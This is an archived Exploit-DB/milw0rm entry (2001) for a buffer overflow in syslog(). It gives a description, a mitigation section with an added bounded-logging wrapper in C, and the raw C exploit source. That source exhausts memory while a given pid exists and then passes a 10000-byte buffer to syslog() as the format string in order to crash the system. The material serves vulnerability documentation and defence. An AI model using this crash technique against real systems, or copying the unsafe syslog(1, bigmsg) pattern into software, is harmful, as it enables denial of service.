vendor: N/A
by: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2001

Buffer Overflow in syslog()

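This exploit targets a buffer overflow in the syslog() function. The overflow is triggered when a large string is passed to syslog(), which causes a stack overflow. The exploit is written in C and is designed to crash the system. As written, it loops for as long as /proc/<pid>/stat exists for the pid given on the command line, allocating 10000-byte blocks until malloc() fails, and then passes a 10000-byte buffer filled with 'X' to syslog().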

Mitigation:

The best way to mitigate this vulnerability is to ensure that syslog() is never called with large strings, which means bounding the length of every message before it is logged.
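One way to apply this mitigation in calling code, as an added example that is not part of the original entry: the message is truncated to a fixed size and passed as an argument to a constant "%s" format, rather than as the format string itself as in the `syslog(1, bigmsg)` call in the source below. The cap `LOG_MSG_MAX` and the names `bound_log_msg` and `safe_syslog` are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Assumed cap for one log record; not a value from the page. */
#define LOG_MSG_MAX 1024

/* Copy at most outsz-1 bytes of `in` to `out`, replacing control characters
 * with '?'. Returns how many input bytes were dropped (0 = fit). */
size_t bound_log_msg(const char *in, char *out, size_t outsz)
{
    size_t inlen = strlen(in);
    if (outsz == 0)
        return inlen;
    size_t n = inlen < outsz - 1 ? inlen : outsz - 1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        out[i] = (c < 0x20 || c == 0x7f) ? '?' : (char)c;
    }
    out[n] = '\0';
    return inlen - n;
}

/* Hypothetical wrapper: constant format string, bounded payload. */
size_t safe_syslog(int priority, const char *msg)
{
    char buf[LOG_MSG_MAX];
    size_t dropped = bound_log_msg(msg, buf, sizeof(buf));
    if (dropped)
        syslog(priority, "%s [truncated %zu bytes]", buf, dropped);
    else
        syslog(priority, "%s", buf);
    return dropped;
}

int main(void)
{
    char big[10000];                 /* constructed sample input */
    memset(big, 'X', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';
    openlog("demo", LOG_PID, LOG_USER);
    printf("dropped=%zu\n", safe_syslog(LOG_NOTICE, big));
    closelog();
    return 0;
}
```

Because the payload never reaches syslog() as a format string, `%` sequences in untrusted input are logged literally, and replacing control characters keeps one call from producing several log lines.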
Source

Exploit-DB raw data:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>	/* memset() */
#include <syslog.h>

#error

int main(int argc, char **argv)
{
	char foo[1000];
	char bigmsg[10000];
	char *s, *hold_s = NULL;	/* initialised so the free() check below is defined */
	int i = 0;

	/* fill the message buffer with 'X' */
	memset(bigmsg, 'X', sizeof(bigmsg)-1);
	if (argc < 2) {
		printf("usage: %s <pid to kill>\n", argv[0]);
		exit(1);
	}
//	fork();
	memset(foo, 0, sizeof(foo));
	snprintf(foo, sizeof(foo), "/proc/%s/stat", argv[1]);
	/* loop for as long as the given pid exists */
	while (access(foo, F_OK) == 0) {
		s = malloc(10000);
		if (s == NULL) {
			/* allocation failed: release the previous block, then log the big message */
			if (hold_s)
				free(hold_s);
/*			if (s)
				s[i%10000] = 0;
*/			printf("crashing ... \n");
			openlog("b00m", 0, 0);
			syslog(1, bigmsg);
			closelog();
		}
		printf("%d\r", i++); fflush(stdout);
		hold_s = s;
	}
	return 0;
}


// milw0rm.com [2001-01-03]